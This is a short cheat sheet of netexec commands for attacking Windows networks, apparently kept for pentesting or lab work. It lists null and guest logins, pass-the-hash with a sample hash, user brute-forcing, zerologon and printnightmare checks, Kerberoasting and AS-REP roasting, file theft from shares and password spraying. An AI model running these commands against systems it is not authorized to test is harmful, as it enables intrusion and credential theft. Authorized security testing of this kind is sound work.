netexec CheatSheet


1.0 Installation

2.0 Configuration

3.0 Usage

3.1 Enumeration

3.1.1 Initial Enumeration

First Run
netexec smb $ip
Vulnerabilities
netexec smb $ip -u '' -p '' -M <MOD>
# Use nopac, zerologon, printnightmare, smbghost as <MOD>

3.1.2 Authentication Enumeration

Null Authentication
netexec smb $ip -u '' -p ''
Guest Authentication
netexec smb $ip -u 'guest' -p ''
Local Authentication
netexec smb $ip -u username -p password --local-auth
Kerberos Authentication
netexec smb $ip -u username -p password -k
Pass-the-Hash Authentication
netexec smb $ip -u username -H 5b38382017f8c0ac215895d5f9aacac4

3.1.3 Username Enumeration

netexec smb $ip -u '' -p '' --users
netexec smb $ip -u '' -p '' --rid-brute
netexec smb $ip -u username -p password --users

3.2 SMB

All in One
netexec smb $ip -u username -p password --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol
Spider-Plus Module
netexec smb $ip -u username -p password -M spider_plus
netexec smb target -u username -p password -M spider_plus -o READ_ONLY=false
Dump a specific file
netexec smb $ip -u username -p password -k --get-file target_file output_file --share sharename

3.3 LDAP

All in One
netexec ldap $ip -u username -p password --trusted-for-delegation  --password-not-required --admin-count --users --groups
LDAP User Enumeration
netexec ldap $ip -u '' -p '' --users

3.3.1 Kerberos

ASREPRost
netexec ldap $ip -u username -p password --asreproast asrep.txt
KerberRoast
netexec ldap $ip -u username -p password --kerberoasting kerb.txt

3.4 FTP

List Files and Folders
netexec ftp $ip -u username -p password --ls
List Files inside a Folder
netexec ftp $ip -u username -p password --ls folder_name
Retrieve a specific file
netexec ftp $ip -u username -p password --ls folder_name --get file_name

3.5 Misc

3.5.1 Password Spraying

netexec smb $ip -u users.txt -p password --continue-on-success
netexec smb $ip -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-success
netexec ssh $ip -u username -p password --continue-on-success

4.0 Hints

5.0 References

6.0 Tags

  • #OS/Kali
  • #Label/CheatSheet
  • #public